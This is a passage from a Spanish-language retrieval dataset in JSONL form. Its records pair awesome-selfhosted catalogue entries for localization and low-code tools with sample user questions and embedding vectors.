0.00774, -0.00832, -0.04849, -0.03563, 0.04618, 0.01724, -0.08165, 0.11776, -0.11124, -0.03989, -0.08953, -0.04782, -0.08898, -0.04192, 0.03067, 0.07433, -0.08706, 0.07516, -0.19869, 0.04704, 0.04273, -0.0389, 0.06118, 0.01957, 0.02784, 0.10475, -0.02166, 0.07444, 0.07418, -0.10937, 0.09614, 0.00783, 0.10747, 0.01836, 0.01467, 0.03931, 0.00397, -0.03859, -0.01749, 0.01467, -0.04749, 0.01646, 0.00489, -0.03821, 0.07321, -0.02692, -0.02548, 0.01612, -0.02744, 0.04235, -0.04998, -0.03286, -0.06698, -0.0456, -0.08662, 0.0349, -0.05288, 0.0748, -0.0363, 0.03697, 0.08464, -0.03187, -0.03831, -0.07062, 0.02405, -0.14119, 0.12243, 0.07493, -0.06558, -0.06146, 0.01934, 0.00366, -0.11433, -0.043, -0.02485, -0.06401, 0.11251, 0.03095, -0.00877, 0.04502, -0.07108, -0.14935, -0.04289, 0.01709, 0.02865, 0.1602, 0.02284, 0.05008, 0.18983, -0.02965, 0.05056, -0.06079, -0.08743, -0.04781, -0.0323, -0.04284, -0.03945, 0.02274, 0.00232, 0.05935, -0.06751, -0.11089, 0.02354, -0.02819, 0.09958, 0.07626, -0.0323, 0.01436, -0.00886, 0.03116, 0.00126, 0.03182, -0.08319, -0.04246, 0.06637, -0.07766, -0.00206, -0.01899, -0.04843, -0.10269, 0.0132, -0.07628, -0.02424, -0.04496, -0.05523, -0.00838, -0.00623, 0.00254, 0.06856, 0.04259, 0.10876, -0.04198, 0.10546, 0.06114, -0.08318, 0.05551, -0.02467, -0.00073, -0.04299, 0.05331, -0.0675, -0.08767, -0.00593, 0.08186, 0.03862, -0.00091, -0.04389, -0.07134, 0.09424, -0.09012, 0.0131, -0.01627, 0.06624, -0.02393, -0.03142, 0.05395, -0.01242, -0.00944, -0.00774, -0.05708, -0.03006, -0.05982, -0.06053, 0.05865, 0.01748, 0.00048, 0.11652, -0.00999, 0.04633, 0.04201, 0.12003, -0.03458, 0.03074, 0.03807, 0.06475, -0.01434, -0.07853, 0.00323, 0.07767, 0.0319, -0.01307, -0.01169, -0.02547, 0.00453, 0.01678, -0.03422, -0.05022, 0.02675, 0.00282, -0.00114, 0.01355, -0.02476, -0.02752, -0.01129, -0.01266, 0.02382, -0.04667, -0.02481, -0.01377, -0.04972, -0.04689, -0.07771, 0.0699, 0.04852, -0.02345, -0.05795, 0.0162, -0.05199, 0.00423, -0.02, 0.01817, -0.03428, 0.05188, 0.03854, -0.03357, 0.03148, 0.06557]} -{"tipo": "pregunta", "herramienta": "Software Development - Localization", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Localization", "tema": "software development - localization", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Localization: Accent β€” Developer-oriented translation tool [BSD-3-Clause, Elixir/Docker]. Tolgee β€” Developer & translator friendly web-based localization platform enabling users to translate directly in the app they develop [Apache-2.0, Docker/Java]. Traduora β€” Translation management platform for teams [AGPL-3.0, Docker/K8S/Nodejs]. Weblate β€” Web-based translation tool with tight version control integration [GPL-3.0, Python/Docker/K8S].", "indexar": "quΓ© herramienta me sirve para que los usuarios traduzcan directamente dentro del app que estoy desarrollando", "v": [-0.08994, 0.16214, -0.21484, -0.18666, 0.05099, -0.0531, -0.1018, -0.03159, -0.02093, -0.08757, -0.14181, -0.12181, -0.0836, -0.0961, 0.0724, -0.05358, 0.06214, -0.06928, 0.11307, 0.02525, 0.02189, -0.0363, -0.1446, -0.08894, -0.12052, -0.01557, 0.05926, -0.05096, -0.1464, 0.01001, 0.02879, 0.01235, 0.00277, -0.05743, -0.11702, -0.10553, 0.01285, 0.07194, -0.00675, 0.15455, 0.01833, 0.03259, -0.07863, 0.0206, 0.0393, 0.07246, -0.00212, -0.09733, -0.08608, 0.08366, -0.08945, -0.12511, -0.06219, 0.07213, -0.05665, -0.11199, 0.16724, -0.22414, 0.1438, -0.09619, -0.07306, 0.00264, 0.04515, -0.01686, 0.08425, -0.06149, 0.02879, 0.00672, -0.1226, 0.06618, -0.0024, 0.16015, 0.01947, -0.05325, -0.00169, 0.04488, -0.01946, -0.0106, 0.04905, -0.00953, 0.07414, -0.0216, -0.07644, -0.0011, 0.0092, -0.0462, 0.10074, 0.04716, 0.04195, -0.04009, -0.02657, -0.02034, -0.02509, -0.0329, 0.03092, -0.01421, 0.05507, -0.06332, 0.02352, 0.01468, 0.09521, -0.07697, -0.02307, 0.01179, -0.05381, 0.02002, 0.05452, -0.02431, -0.03378, 0.00061, 0.08807, 0.00417, 0.02878, 0.00872, -0.01814, 0.0732, -0.0071, -0.07011, 0.01286, -0.07845, -0.00895, 0.01982, -0.03073, -0.07153, 0.0268, -0.03065, 0.00873, 0.10697, -6e-05, -0.03397, -0.03151, -0.06338, -0.04945, 0.06904, -0.05307, -0.03036, 0.00053, -0.0553, 0.03587, 0.00781, 0.00264, 0.0234, -0.05254, -0.04253, 0.04186, -0.03869, 0.03561, -0.06657, 0.01985, -0.01133, 0.03778, -0.10947, -0.02323, 0.03288, -0.05984, -0.0061, 0.00536, -0.06757, -0.10812, 0.03573, -0.06122, -0.05639, -0.00443, -0.02668, -0.05612, -0.08284, 0.02667, 0.0087, 0.09588, 0.05723, 0.02661, 0.0396, 0.09292, -0.06461, 0.02831, -0.01014, -0.02357, 0.02946, 0.00151, -0.07138, -0.04998, -0.05288, -0.00308, -0.05486, -0.00343, -0.05563, -0.00171, 0.01867, -0.04262, 0.06317, -0.07366, 0.05943, 0.00446, -0.04891, 0.00956, -0.02789, 0.02804, -0.02353, -0.00355, -0.11367, -0.03226, -0.02612, 0.01538, -0.00685, 0.00794, 0.04456, 0.04412, -0.00162, -0.00536, 0.02019, 0.0108, 0.0432, 0.05956, 0.03444, 0.01932, -0.04023, 0.04797, 0.04504, 0.03561, -0.05824, -0.01691, -0.01607, 0.06879, 0.0, 0.00586, 0.05961, 0.01725, -0.02887, 0.00283, -0.00349, -0.00965, -0.04585, -0.06446, -0.0063, 0.00978, -0.05017, 0.02593, 0.00729, -0.07189, -0.07096, -0.02431, 0.083, 0.02187, -0.01241, -0.07513, -0.02981, -0.01249, -0.01939, -0.05758, -0.06362, -0.05635, 0.06413, 0.11772, -0.0165, 0.0071, -0.02009]} -{"tipo": "pregunta", "herramienta": "Software Development - Localization", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Localization", "tema": "software development - localization", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Localization: Accent β€” Developer-oriented translation tool [BSD-3-Clause, Elixir/Docker]. Tolgee β€” Developer & translator friendly web-based localization platform enabling users to translate directly in the app they develop [Apache-2.0, Docker/Java]. Traduora β€” Translation management platform for teams [AGPL-3.0, Docker/K8S/Nodejs]. Weblate β€” Web-based translation tool with tight version control integration [GPL-3.0, Python/Docker/K8S].", "indexar": "cual es una alternativa libre a las plataformas de gestiΓ³n de traducciones", "v": [0.10082, 0.06587, 0.00728, -0.14127, -0.0304, 0.01547, 0.03937, -0.0783, -0.1576, -0.02603, -0.06646, -0.12294, -0.00607, 0.05636, 0.08341, -0.02633, 0.11793, -0.08747, 0.08586, -0.04869, -0.09191, -0.02123, -0.05499, -0.1326, -0.03435, -0.11727, 0.0448, -0.03817, -0.03496, -0.02327, -0.07842, -0.00435, 0.04177, -0.00396, -0.01201, -0.02627, 0.08136, 0.10681, 0.07596, -0.05205, -0.03296, -0.12674, 0.01377, 0.08298, 0.01823, -0.12692, -0.01095, -0.03618, 0.04627, 0.02508, -0.0792, -0.07353, -0.13628, 0.04891, 0.11324, -0.08331, 0.15431, -0.17858, -0.00722, -0.00274, -0.0992, 0.05534, 0.12282, -0.03751, 0.06682, 0.08271, -0.06278, 0.03462, -0.05757, 0.15564, 0.07747, 0.01945, 0.00608, 0.00823, -0.05413, 0.04245, 0.00762, -0.03986, -0.07005, -0.00075, 0.12008, -0.06139, -0.06092, 0.0883, 0.01055, -0.02712, 0.05029, -0.15343, 0.0451, 0.02295, -0.05949, -0.16144, 0.00468, -0.01465, -0.00712, -0.07144, -0.01739, -0.01572, -0.04463, 0.02302, 0.00148, 0.04722, -0.03664, -0.03537, -0.0948, 0.11767, 0.01804, -0.07418, -0.04801, 0.06404, 0.064, 0.01575, 0.04011, 0.00527, -0.03269, 0.02681, 0.00341, 0.06665, 0.05226, 0.01473, -0.07544, -0.1011, -0.01631, -0.11075, 0.12683, 0.01857, 0.09636, 0.07215, -0.01868, 0.03477, 0.00529, -0.0996, -0.08018, -0.06821, -0.03936, -0.05962, 0.12655, 0.04732, 0.07408, -0.05917, -0.11848, 0.04662, 0.01473, -0.00989, 0.08316, -0.04583, 0.01554, -0.04186, 0.00584, 0.00838, -0.04057, -0.02265, -0.00912, 0.13042, -0.06805, 0.03343, -0.03134, 0.00192, -0.167, 0.09285, 0.04183, -0.05323, -0.00022, -0.00296, -0.05438, 0.02362, 0.01413, 0.05774, -0.05555, 0.01215, 0.03008, 0.08284, 0.04634, -0.12074, 0.01411, -0.09012, -0.03133, -0.06579, 0.03571, -0.03006, 0.00853, -0.0263, -0.09126, -0.01493, 0.01305, -0.05189, -0.01281, -0.01328, -0.06005, 0.03714, 0.00214, -0.02664, -0.1023, -0.0887, 0.00396, 0.01253, -0.03494, 0.00905, -0.03714, -0.04918, -0.08845, -0.04709, 0.024, -0.01539, -0.07085, 0.01579, -0.04548, 0.05088, 0.02448, 0.06545, -0.01087, 0.06389, 0.02819, 0.02526, -0.02357, -0.04745, 0.00067, -0.03378, 0.02376, -0.08358, 0.01331, -0.00253, -0.00587, 0.00453, -0.06141, 0.0279, 0.04378, 0.0291, -0.01572, -0.004, 0.01031, -0.00067, 0.02096, 0.05528, -0.01833, -0.07805, 0.00443, 0.04462, -0.03794, -0.04715, 0.00055, 0.07603, 0.00321, 0.01081, -0.04661, 0.01855, -0.06085, -0.03743, -0.02582, -0.04451, -0.0281, 0.03969, 0.01859, 0.01915, 0.0277, 0.01538]} -{"tipo": "pregunta", "herramienta": "Software Development - Low Code", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Low Code", "tema": "software development - low code", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Low Code: Appsmith β€” Build admin panels, CRUD apps and workflows. Build everything you need, 10x faster [Apache-2.0, Java/Docker/K8S]. Appwrite β€” End to end backend server for web, native, and mobile developers πŸš€ [BSD-3-Clause, Docker]. Halo β€” A powerful and easy-to-use website building tool (documentation in Chinese) [GPL-3.0, Java/Docker]. Manifest β€” Complete backend that fits into 1 YAML file [MIT, Nodejs]. PocketBase β€” Backend for your next SaaS and Mobile app in one file [MIT, Go/Docker]. Saltcorn β€” No-code database application builder for web and mobile applications. One platform for user interface, data backend, durable workflows, email, PDF generation, and AI applications [MIT, Docker/Nodejs]. SQLPage β€” SQL-only dynamic website builder [MIT, Rust/Docker]. ToolJet β€” Low-code framework to build & deploy internal tools with minimal engineering effort (alternative to Retool and Mendix) [GPL-3.0, Nodejs/Docker/K8S].", "indexar": "ΒΏcon quΓ© puedo montar paneles de administraciΓ³n o aplicaciones CRUD sin programar mucho?", "v": [0.04515, 0.04556, -0.04686, -0.23765, -0.04712, -0.07513, 0.15399, 0.06657, -0.20897, -0.05499, -0.1238, -0.07009, 0.01467, -0.13023, 0.04043, 0.04513, -0.0168, -0.05649, 0.09565, 0.05072, -0.03855, -0.04352, -0.06875, -0.01106, -0.06782, 0.12079, 0.03172, -0.131, 0.00529, -0.06424, 0.0414, 0.11887, 0.14016, -0.06395, -0.10822, -0.08003, -0.01371, 0.02086, -0.07606, 0.09818, -0.06174, -0.00369, 0.01233, 0.02676, 0.10305, -0.04405, 0.08911, -0.07359, -0.02583, -0.01399, -0.09193, -0.06167, -0.06603, 0.05207, 0.08294, -0.05407, 0.03773, -0.03879, 0.07049, -0.07169, 0.00312, 0.18577, 0.01374, 0.09246, -0.00524, 0.02735, 0.01832, 0.07957, -0.11272, 0.06929, -0.00279, -0.0134, -0.02271, -0.00218, 0.06548, 0.07139, -0.00659, -0.02659, 0.06477, 0.01674, -0.04748, 0.00602, -0.09671, 0.1127, -0.10215, -0.05621, 0.00517, -0.03547, -0.05751, -0.0256, 0.03103, -0.00671, 0.00503, 0.00963, 0.09134, -0.05852, 0.0921, 0.08139, 0.05598, 0.13076, -0.01925, -0.06052, -0.04146, 0.0791, -0.10149, 0.09427, 0.08695, -0.12304, 0.07982, -0.04844, 0.03288, -0.02597, -0.05642, 0.03803, -0.06343, -0.03338, -0.02903, -0.02969, -0.05243, -0.04734, -0.03807, 0.03082, 0.06544, -0.02228, 0.09752, -0.00783, 0.07986, 0.19523, -0.11115, 0.04628, 0.05727, -0.07113, -0.06066, 0.00479, -0.08559, 0.08175, -0.02574, -0.05387, 0.00235, -0.02236, 0.04793, 0.03883, -0.03857, 0.00884, 0.07449, 0.03673, 0.04273, -0.02678, 0.07149, 0.04853, 0.11772, 0.02204, 0.06864, 0.05327, -0.06472, -0.0184, 0.03356, -0.0448, -0.01244, -0.00345, -0.08884, -0.00213, -0.0375, 0.00447, 0.01735, -0.06773, -0.01788, 0.02368, 0.10112, 0.10565, -0.02223, 0.11258, 0.06851, -0.01061, 0.0959, -0.02433, 0.06594, -0.03283, 0.0028, -0.06547, -0.09979, 0.01791, 0.03471, 0.03722, 0.03328, 0.0121, -0.03001, -0.00258, -0.00301, 0.03902, 0.02575, 0.06971, 0.00508, -0.03958, 0.01055, -0.0055, 0.04173, -0.03385, 0.00067, 0.01549, -0.00419, -0.00044, -0.00367, -0.01017, 0.04356, 0.07618, -0.05372, 0.13576, 0.01262, 0.085, 0.01463, 0.02817, 0.03257, 0.05771, -0.01422, -0.07013, 0.01384, 0.06421, 0.00734, -0.01569, 0.01504, 0.01108, 0.0238, 0.01808, 0.04664, -0.00448, 0.0033, 0.08021, -0.01713, 0.02532, -0.00629, 0.01363, 0.02995, -0.01372, -0.00089, 0.00482, 0.01226, 0.00814, -0.02067, -0.02702, -0.00942, 0.06992, 0.04895, -0.04509, -0.02597, -0.04662, -0.03052, -0.00101, -0.03861, -0.02351, -0.0616, 0.03555, 0.03196, -0.00321, 0.00402, 0.00438]} -{"tipo": "pregunta", "herramienta": "Software Development - Low Code", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Low Code", "tema": "software development - low code", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Low Code: Appsmith β€” Build admin panels, CRUD apps and workflows. Build everything you need, 10x faster [Apache-2.0, Java/Docker/K8S]. Appwrite β€” End to end backend server for web, native, and mobile developers πŸš€ [BSD-3-Clause, Docker]. Halo β€” A powerful and easy-to-use website building tool (documentation in Chinese) [GPL-3.0, Java/Docker]. Manifest β€” Complete backend that fits into 1 YAML file [MIT, Nodejs]. PocketBase β€” Backend for your next SaaS and Mobile app in one file [MIT, Go/Docker]. Saltcorn β€” No-code database application builder for web and mobile applications. One platform for user interface, data backend, durable workflows, email, PDF generation, and AI applications [MIT, Docker/Nodejs]. SQLPage β€” SQL-only dynamic website builder [MIT, Rust/Docker]. ToolJet β€” Low-code framework to build & deploy internal tools with minimal engineering effort (alternative to Retool and Mendix) [GPL-3.0, Nodejs/Docker/K8S].", "indexar": "ΒΏhay una alternativa libre a Retool para crear herramientas internas con poco esfuerzo?", "v": [-0.06206, 0.09011, -0.24767, -0.08408, -0.03804, -0.09356, -0.0904, 0.01945, -0.0725, -0.03941, -0.11874, -0.05118, -0.00073, -0.03628, 0.13392, 0.05405, -0.00046, -0.05544, 0.05356, 0.00944, -0.08383, -0.02422, -0.1895, -0.02147, 0.06783, -0.13712, -0.01214, -0.01155, -0.15834, 0.10082, -0.00623, 0.05604, 0.05368, -0.06961, -0.04891, -0.00573, 0.10411, 0.09282, 0.04711, -0.03842, -0.03699, -0.02999, -0.11617, 0.22544, -0.01018, -0.03067, -0.04781, 0.04227, -0.07184, 0.1967, -0.04795, -0.0836, 0.03256, -0.01344, 0.09389, -0.10061, 0.10529, -0.1068, -0.08691, -0.12653, -0.18063, 0.07616, -0.02553, 0.03318, 0.01839, 0.02577, -0.07952, -0.08596, -0.07879, 0.21603, -0.06275, -0.07821, 0.00163, -0.07018, -0.0599, 0.05515, -0.01173, 0.02051, -0.08578, -0.02453, -0.02105, -0.07625, -0.0248, -0.0113, 0.00091, -0.08424, 0.12339, -0.07447, 0.05887, -0.07331, 0.01622, 0.00081, -0.03408, 0.04997, -0.03755, 0.01693, 0.05119, 0.03268, -0.01181, 0.02388, 0.04257, -0.08492, -0.02515, -0.0537, -0.00368, 0.00684, -0.01683, 0.03412, -0.06493, 0.06289, 0.0345, 0.08014, 0.03104, 0.06153, -0.01535, 0.00941, -0.06056, 0.0227, -0.05478, -0.06995, 0.06395, 0.02983, -0.1209, -0.00401, -0.04705, -0.0138, -0.00178, -0.00824, -0.0027, 0.00374, 0.06357, -0.01088, -0.08204, -0.05843, -0.08065, -0.02644, 0.06656, -0.08697, -0.02576, -0.05369, -0.00397, -0.00237, -0.03626, -0.12736, 0.00041, -0.02699, -0.00471, -0.06083, -0.01577, -0.02911, -0.03192, -0.02427, 0.06855, 0.10354, -0.08839, -0.00746, -0.03262, 0.01687, -0.05705, 0.06322, -0.05519, 0.03631, -0.03285, -0.04832, 0.01298, -0.05921, -0.03604, 0.0373, -0.00423, 0.04137, -0.02379, 0.04361, 0.10031, -0.05936, 0.04031, -0.02862, 0.006, -0.09098, -0.03015, -0.04303, 0.04924, 0.05156, -0.08771, -0.04267, 0.03404, -0.03783, 0.03814, 0.04552, 0.01157, 0.03158, -0.06613, 0.04168, -0.0562, -0.07401, 0.01518, 0.02912, -0.00347, -0.07313, -0.01299, 0.01455, -0.04082, 0.00596, 0.01448, -0.0542, 0.00174, -0.02129, -0.04039, 0.02093, -0.00588, 0.0117, 0.06866, 0.00621, 0.0645, 0.02778, -0.07999, 0.00726, -0.01193, -0.01509, -0.00411, -0.05765, 0.06274, 0.02553, 0.00168, -0.00175, 0.01395, 0.04998, -0.00843, 0.06408, -0.04693, -0.01449, 0.03487, -0.05965, -0.02602, -0.01366, -0.02094, -0.0583, 0.04757, 0.02781, 0.01142, 0.04469, 0.04785, 0.03772, -0.00866, 0.00812, -0.07417, 0.01145, -0.01171, -0.02765, -0.07268, -0.00099, -0.03558, -0.02021, -0.03609, -0.0016, 0.02499, -0.01647]} -{"tipo": "pregunta", "herramienta": "Software Development - Low Code", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Low Code", "tema": "software development - low code", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Low Code: Appsmith β€” Build admin panels, CRUD apps and workflows. Build everything you need, 10x faster [Apache-2.0, Java/Docker/K8S]. Appwrite β€” End to end backend server for web, native, and mobile developers πŸš€ [BSD-3-Clause, Docker]. Halo β€” A powerful and easy-to-use website building tool (documentation in Chinese) [GPL-3.0, Java/Docker]. Manifest β€” Complete backend that fits into 1 YAML file [MIT, Nodejs]. PocketBase β€” Backend for your next SaaS and Mobile app in one file [MIT, Go/Docker]. Saltcorn β€” No-code database application builder for web and mobile applications. One platform for user interface, data backend, durable workflows, email, PDF generation, and AI applications [MIT, Docker/Nodejs]. SQLPage β€” SQL-only dynamic website builder [MIT, Rust/Docker]. ToolJet β€” Low-code framework to build & deploy internal tools with minimal engineering effort (alternative to Retool and Mendix) [GPL-3.0, Nodejs/Docker/K8S].", "indexar": "quΓ© programa sirve para construir bases de datos y servidores completos en un solo archivo?", "v": [-0.01893, -0.00664, -0.06654, -0.18944, 0.03601, -0.16037, 0.12794, -0.14223, -0.08051, -0.09019, -0.14059, -0.09244, -0.02355, -0.07679, 0.02481, -0.01086, 0.15899, -0.12386, 0.05321, 0.00986, 0.02137, 0.01188, 0.05019, -0.013, -0.12703, -0.01196, 0.06684, -0.0259, -0.10463, 0.10872, 0.07334, -0.00283, 0.03027, 0.00269, 0.06278, 0.03154, 0.00696, 0.09965, -0.19983, 0.0035, 0.02602, 0.02339, -0.11486, 0.05566, 0.03778, -0.03845, 0.03682, -0.03076, 0.06578, -0.07418, -0.04703, -0.00456, -0.02069, -0.0327, -0.03332, -0.11652, -0.02354, -0.21064, 0.02333, 0.11395, -0.16722, 0.08329, 0.03313, -0.04864, 0.0397, -0.05945, 0.02125, 0.0197, -0.07367, 0.01059, -0.11092, 0.10769, 0.04016, -0.07777, -0.04317, 0.00111, -0.03446, -0.08534, -0.05861, 0.02215, -0.03246, 0.00076, -0.0901, 0.07759, -0.09647, 0.03027, -0.02421, 0.02539, -0.02072, -0.03746, 0.11911, 0.11603, -0.06786, 0.0984, 0.02897, 0.00082, 0.12886, -0.01369, 0.04939, 0.06182, 0.00054, -0.02003, 0.04169, 0.04631, 0.01848, 0.14569, 0.08337, 0.00221, -0.05626, -0.04291, 0.00381, -0.05362, -0.00504, 0.04172, -0.04113, -0.0845, 0.01309, -0.02356, 0.02046, 0.01997, -0.03059, 0.05337, 0.02217, 0.06776, -0.00511, -0.08723, -0.02173, 0.08224, 0.01549, 0.05047, -0.00907, 0.04163, -0.11811, -0.01909, -0.01185, -0.02966, 0.06691, -0.00561, -0.04349, -0.11369, 0.03711, 0.08133, -0.03401, 0.0464, 0.01793, -0.00526, 0.06612, -0.01407, -0.04128, -0.04615, 0.00575, 0.01766, -0.01305, 0.02638, -0.15383, -0.0314, 0.04675, -0.09513, -0.09122, 0.0409, 0.01176, 0.10967, -0.05157, 0.03651, 0.07847, -0.09524, -0.01287, 0.04341, 0.06421, 0.04968, -0.00484, 0.02063, 0.05261, -0.14163, -0.02032, -0.02821, -0.10212, -0.09739, 0.01727, -0.00026, -0.02105, -0.0045, 0.03206, 0.06859, -0.0366, -0.07964, -0.01518, -0.0444, 0.03279, -0.00962, 0.00115, 0.02865, -0.0159, 0.05072, 0.04337, -0.03484, -0.05825, 0.04357, 0.0361, -0.0089, -0.01057, -0.00504, -0.0421, 0.04633, 0.02033, 0.05992, -0.0388, -0.04556, 0.01607, 0.02983, 0.01776, -0.0146, 0.08029, -0.01279, -0.03972, -0.02263, 0.07501, 0.03323, 0.04433, -0.00446, -0.04307, 0.04315, 0.04448, -0.00547, 0.01998, -0.00195, 0.05623, -0.01894, 0.00919, -0.00591, 0.0017, 0.03641, -0.00119, 0.01438, 0.02229, -0.03577, -0.01517, -0.0084, -0.02444, -0.11462, -0.0019, 0.09582, -0.03934, -0.08994, 0.00552, -0.05631, -0.03486, 0.03782, -0.00104, -0.06719, -0.07146, -0.02195, 0.02514, -0.03854, 0.01639, -0.02407]} -{"tipo": "pregunta", "herramienta": "Software Development - Low Code", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Low Code", "tema": "software development - low code", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Low Code: TrailBase β€” Open, sub-millisecond, single-executable FireBase alternative with type-safe REST & realtime APIs, built-in JS/TS runtime, auth & admin UI [OSL-3.0, Rust/Docker].", "indexar": "Que alternativa open source a Firebase tengo para desarrollo low code?", "v": [-0.21634, -0.01193, -0.078, -0.11507, -0.15923, -0.0761, -0.04803, 0.05084, -0.18125, -0.11953, -0.12537, -0.19229, -0.13235, 0.01381, 0.08101, -0.10964, 0.01637, -0.04479, 0.09251, -0.12142, -0.03035, 0.01145, -0.1688, -0.13077, 0.04495, -0.04639, -0.06007, -0.05349, -0.0595, -0.10549, 0.08912, -0.01572, 0.08149, 0.19749, -0.07213, 0.04021, 0.04686, 0.01526, 0.04759, -0.03028, -0.01456, -0.03016, -0.01762, 0.11759, 0.04417, -0.07383, -0.01357, -0.01558, 0.06086, 0.00832, -0.14016, 0.00253, 0.00162, -0.07121, 0.07796, 0.0646, 0.10038, -0.14884, -0.07783, 0.06558, -0.00801, -0.09323, 0.10424, -0.26587, 0.02549, -0.04813, 0.06263, 0.03964, -0.07309, 0.03311, -0.07602, 0.03668, -0.06492, -0.06427, -0.034, -0.05647, -0.01074, -0.02955, -0.02116, 0.15576, -0.05081, -0.01712, -0.0306, 0.01189, -0.07151, -0.03505, 0.04645, -0.08994, -0.02874, -0.0297, 0.02118, -0.04446, -0.01184, 0.0916, -0.03739, -0.05986, -0.05319, 0.09294, -0.02271, 0.03386, -0.05878, -0.02918, 0.07397, 0.01373, 0.13041, 0.00034, 0.10356, -0.05519, -0.06844, 0.03259, -0.03503, -0.00359, 0.03695, 0.0221, -0.00808, -0.0598, -0.0324, -0.01231, 0.00382, -0.0334, -0.01497, 0.03156, -0.06547, 0.04251, 0.00289, 0.01952, 0.01768, 0.0436, -0.04616, 0.04994, -0.02221, -0.09634, -0.00055, -0.01156, -0.04314, 0.04178, 0.07278, 0.0496, 0.06756, 0.04113, -0.00198, 0.02812, 0.03313, -0.00261, 0.07467, -0.05822, -0.0311, -0.00628, 0.02738, -0.0439, -0.06747, -0.00346, -0.03961, 0.03455, -0.15044, 0.02852, -0.02723, 0.05372, -0.04019, 0.01142, 0.04872, 0.03686, -0.0408, 5e-05, -0.03888, 0.03778, 0.05204, 0.01083, 0.02048, 0.00273, 0.04944, 0.07765, 0.03867, -0.0251, 0.09673, -0.05404, -0.00056, -0.05567, -0.03731, -0.03172, 0.00468, 0.0308, -0.00196, 0.05592, 0.0491, -0.00211, 0.04307, -0.05335, -0.00667, 0.00433, -0.0592, -0.07696, -0.02371, -0.05711, 0.02765, -0.0129, 0.01006, -0.03666, -0.00972, -0.01348, -0.07268, 0.057, -0.00159, -0.03252, 0.00675, 0.0012, -0.00853, 0.00956, -0.02814, -0.0039, 0.04826, 0.01075, 0.08496, 0.05454, 0.01188, 0.02915, -0.02978, 0.08683, 0.07588, -0.07367, -0.03437, -0.00667, -0.01434, 0.0029, 0.04468, -0.02629, -0.02356, -0.01173, 0.05469, 0.02661, 0.0362, -0.04292, -0.0023, 0.03749, -0.02323, 0.01223, -0.07533, 0.05568, -0.01586, -0.0393, -0.00216, -0.00169, -0.00112, 0.00961, -0.01074, -0.01808, -0.04275, -0.03557, -0.01772, -0.02751, -0.03979, -0.02542, -0.00792, -0.01323, 0.01565, -0.01535]} -{"tipo": "pregunta", "herramienta": "Software Development - Low Code", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Low Code", "tema": "software development - low code", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Low Code: TrailBase β€” Open, sub-millisecond, single-executable FireBase alternative with type-safe REST & realtime APIs, built-in JS/TS runtime, auth & admin UI [OSL-3.0, Rust/Docker].", "indexar": "QuΓ© herramienta permite APIs en tiempo real y autenticaciΓ³n como un backend completo?", "v": [-0.05031, 0.11861, -0.05119, -0.06223, 0.12626, -0.10582, 0.04333, -0.12404, -0.07889, 0.008, -0.06015, -0.08091, -0.06195, 0.00551, 0.0877, 0.0724, 0.02862, -0.13503, 0.07287, 0.10237, 0.04999, -0.06001, -0.24232, -0.02647, 0.03661, -0.05652, 0.21604, 0.07273, -0.1622, -0.00316, -0.00517, 0.01124, 0.02742, -0.00985, -0.11984, -0.11006, 0.0132, 0.09742, -0.09307, 0.05795, 0.03788, -0.05657, -0.04702, 0.03432, 0.04921, 0.06782, 0.07545, 0.04358, -0.0137, -0.02179, -0.10917, -0.12268, -0.18846, 0.03635, -0.03492, -0.10104, 0.21993, -0.14384, 0.12339, -0.09452, -0.15187, 0.01418, -0.11689, -0.04287, 0.02142, -0.04775, 0.02333, -0.01683, -0.03074, 0.13616, -0.10539, -0.04413, 0.05773, -0.00505, -0.05496, -0.03432, -0.00582, -0.0008, 0.02329, 0.04057, 0.05662, -0.00354, -0.02775, 0.05362, 0.03512, -0.06835, 0.04566, -0.06259, 0.03555, -0.00277, -0.0518, 0.08069, 0.01264, 0.0435, 0.04418, 0.03059, 0.00862, -0.08585, -0.02243, -0.05719, 0.04858, -0.09401, -0.107, -0.02364, 0.10184, 0.08172, 0.01516, -0.05092, -0.05127, -0.00229, -0.03745, 0.01998, -0.08169, 0.03066, 0.07061, 0.07021, 0.01874, -0.08845, 0.0346, -0.08884, -0.01164, 0.027, -0.02549, 0.00445, -0.02716, 0.05632, -0.08227, 0.03678, 0.03613, -0.061, -0.02791, -0.07766, -0.06607, 0.03074, -0.00889, -0.01604, 0.1067, -0.06279, 0.02556, -0.04478, -0.05436, 0.00628, -0.013, -0.05964, 0.0232, -0.03273, -0.06432, -0.08137, -0.04666, -0.01598, 0.03694, 0.02241, -0.01182, 0.03818, -0.06608, -0.02899, -0.07259, 0.01015, -0.12717, 0.05216, -0.0013, -0.00832, -0.03175, -0.04043, -0.00253, -0.05151, 0.04732, -0.0106, 0.07339, 0.00796, 0.0542, 0.09712, 0.08723, -0.08052, 0.03522, 0.01897, -0.01581, -0.01874, 0.00765, -0.12624, -0.02104, -0.07495, 0.02385, -0.00699, 0.04883, -0.05492, 0.00577, -0.00624, -0.02343, 0.02671, -0.03603, 0.03883, 0.06585, -0.01663, 0.05855, 0.04305, -0.00821, -0.02654, 0.00478, -0.02583, -0.02304, -0.03908, -0.00321, -0.03124, -0.00747, 0.05574, -0.03292, 0.02429, -0.00673, 0.02902, 0.01223, 0.00168, 0.03128, 0.00513, -0.01043, 0.00142, 0.00395, -0.01787, -0.03845, 0.00164, -0.02701, 0.00514, 0.02031, 0.02542, 0.04408, 